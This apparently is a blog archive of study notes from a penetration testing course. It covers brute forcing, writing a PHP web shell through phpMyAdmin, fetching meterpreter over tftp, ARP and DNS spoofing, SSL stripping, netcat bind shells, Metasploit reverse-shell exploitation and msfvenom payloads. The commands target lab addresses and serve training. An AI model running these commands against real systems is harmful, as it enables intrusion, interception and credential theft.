Source: Georgia Weidman on "Advanced Penetration Test"
(1) Crunch Tool to bruteforce keyspace $: crunch 7 7 AB Bruteforces all 7 character passwords composed of only the characters A and B (2) ceWL Tool to map a website and pull potentially interesting words to add to a wordlist $: cewl -w [words].txt -d 1 -m 5 www.[website].com Depth 1 Minimum length of word is 5 characters (3) Hydra Online password cracking tool $: hydra -L userlist.txt -P passwordfile.txt 192.168.20.10 pop3 Offline Password Attacks
0 Comments
Source: Georgia Weidman on "Advanced Penetration Test"
(1) Webdav Default Credentials Default -> wampp:xampp a. cadaver http://192.168.0.190/webdav b. Use Msfvenom to create a PHP shell and upload c. Use msfconsole to exploit (2) Open phpMyAdmin a. Create a php shell on the Apache server using a SQL query SELECT "“”<?php system($_GET['cmd']); ?>””" into outfile "C:\\xampp\\htdocs\\shell.php" http://192.168.0.190/shell.php?cmd=ipconfig b. Add a meterpreter PHP file http://192.168.0.190/shell.php?cmd=tftp 172.16.85.131 get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php Source: Georgia Weidman on "Advanced Penetration Test"
(1) ARP Spoofing echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i eth0 -t 192.168.20.11 192.168.20.10 arpspoof -i eth0 -t 192.168.20.10 192.168.20.11 (2) Domain Name Service (DNS) DNS Cache Poisoning hosts.txt: 192.168.20.9 www.gmail.com *Restart arpspoofing between gateway and target dnsspoof -i eth0 -f hosts.txt (3) Secure Socket Layer (SSL) Crypto between browser and webserver Can't see credentials in plaintext SSL Man in the Middle SSL Stripping iptables -t nat -A PREROUTING -p tcp -- destination-port 80 -j REDIRECT --to-port 8080 Spoof the default gateway with Arpspoof sslstrip -l 8080 Source: Georgia Weidman, "Advanced Penetration Test" Cybrary
Query systems for potential vulnerabilities (1) Nessus Vulnerability database + scanner (2) Nmap Scripting Engine Vulnerability scripts Listed in /usr/share/nmap/scripts in Kali nmap -sC 172.16.85.135-136 nmap --script-help=smb-check-vulns nmap --script=nfs-ls 172.16.85.136 nmap --script=smb-os-discovery 172.16.85.136 (3) Metasploit Scanners auxiliary/scanner/ftp/anonymous Web Application Scanning (1) Dirbuster Graphical tool that is used for bruteforcing directories and pages. (2) Nikto Vulnerability database of known website issues nikto -host http://172.16.85.136 Manual Analysis *Default passwords - Webdav *Misconfigured pages – open phpMyAdmin *Port 3232 on the Windows system – sensitive webserver with directory traversal # Source: Cybrary "Advanced Penetration Test"
*Find as much information as possible about the target. *What domains do they own? What job ads are they posting? What is their email structure? What technologies are they using on publicly facing systems? (1) Google Dorks Database of helpful Google Dorks: http://www.exploit-db.com/google-dorks/ Example: xamppdirpasswd.txt filetype:txt finds xampp passwords (2) Shodan (Python API) Search engine that uses banner grabbing (3) Whois Domain registration records root@kali:~# whois ________.com (4) DNS Recon root@kali:~# host www.________.com root@kali:~# host -t ns ________.com root@kali:~# host -t mx ________.com *DNS Zone Transfer root@kali:~# host -t ns zoneedit.com root@kali:~# host -l zoneedit.com ns2.zoneedit.com DNS Bruteforce root@kali:~# fierce -dns ________.com (5) Netcraft http://searchdns.netcraft.com/ (6) The Harvester The Harvester automatically searches for emails etc. online root@kali:~# theharvester -d ________.com -l 500 -b all # Notes on Cybrary "Advanced Penetration Test"
Opening a command shell listener: root@kali:~# nc -lvp 1234 -e /bin/bash Transferring files: Redirect output to a file: root@kali:~# nc -lvp 1234 > netcatfile Send a file from another terminal: root@kali:~# nc 10.0.0.100 1234 < mydirectory/myfile Automating Tasks with cron jobs Add your task to one of the scheduled directories *For more flexibility add a line to /etc/crontab Source: "Advanced Penetration Testing" Cybrary I. # Pings the C class network and prints only live hosts #!/bin/bash if [ “$1” == “”] then echo “Usage: ./pingscript.sh [network]” echo “example: ./pingscript.sh 192.168.20” else for x in `seq 1 254`; do ping -c 1 $1.$x | grep “64 bytes” | cut -d” “ -f4 | sed ‘s/.$//’ done fi II. $: chmod +x [name of the bash script] Source: "Advanced Penetration Testing" Cybrary
*Exploitation Framework *Written in Ruby *Modular Exploits, payloads, auxiliaries, and more Terminology: *Exploit: vector for penetrating the system *Payload: shellcode, what you want the exploit to do after exploitation *Auxiliary: other exploit modules such as scanning, information gathering Session: connection from a successful exploit Interfaces Msfconsole Msfcli Armitage Utilities Msfpayload Msfencode Msfupdate Msfvenom Traditional vs. Metasploit Traditional Exploit Find public exploit Replace offsets, return address, etc. for your target Replace shellcode Metasploit Load Metasploit module Select target Select payload Metasploit Payloads Bind shell – opens a port on the victim machine Reverse shell – pushes a shell back to the attacker Inline – full payload in the exploit Staged – shellcode calls back to attacker to get the rest Msfcli [command line option] O = Show options P = Show payloads E = Run exploit E.g., $: msfcli windows/smb/ms08_067_netapi RHOST=10.0.0.101 PAYLOAD=windows/shell/ reverse_tcp LHOST=10.0.0.100 E Msfvenom Make shellcode and stand alone payloads -l list modules -f output format -p payload to use E.g., $: msfvenom -p windows/messagebox text="Hello World" -f exe > test.exe Multi/Handler *Generic payload handler *Catch payloads started outside of the framework msf> use multi/handler $: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.190 LPORT=1337 -f exe > meterpreter.exe Source: "Advanced Penetration Testing" Cybrary
*Exploitation Framework *Written in Ruby *Modular *Exploits, payloads, auxiliaries, and more Terminology Exploit: vector for penetrating the system Payload: shellcode, what you want the exploit to do after exploitation Auxiliary: other exploit modules such as scanning, information gathering Session: connection from a successful exploit Interfaces Msfconsole Msfcli Armitage Utilities Msfpayload Msfencode Msfupdate Msfvenom Exploitation Streamlining Traditional Exploit Find public exploit Replace offsets, return address, etc. for your target Replace shellcode Metasploit Load Metasploit module Select target Select payload Metasploit Payloads Bind shell – opens a port on the victim machine Reverse shell – pushes a shell back to the attacker Inline – full payload in the exploit Staged – shellcode calls back to attacker to get the rest Msfcli [command line] O = Show options P = Show payloads E = Run exploit E.g., $: msfcli windows/smb/ms08_067_netapi RHOST=10.0.0.101 PAYLOAD=windows/shell/ reverse_tcp LHOST=10.0.0.100 E Msfvenom Example msfvenom -p windows/messagebox text="Hello World" -f exe > test.exe Multi/Handler Generic payload handler Catch payloads started outside of the framework For example payloads from Msfvenom msf> use multi/handler $: msvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.190 LPORT=1337 -f exe > meterpreter.exe Source: "Advanced Penetration Testing" Cybrary
#!/usr/bin/python import socket ip = raw_input(“Enter the ip: “) port = input(“Enter the port: “) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if s.connect_ex((ip,port)): print “Port”, port, “is closed” else: print “Port”, port, “is open |
AuthorVitali Kremez Archives
July 2016
Categories |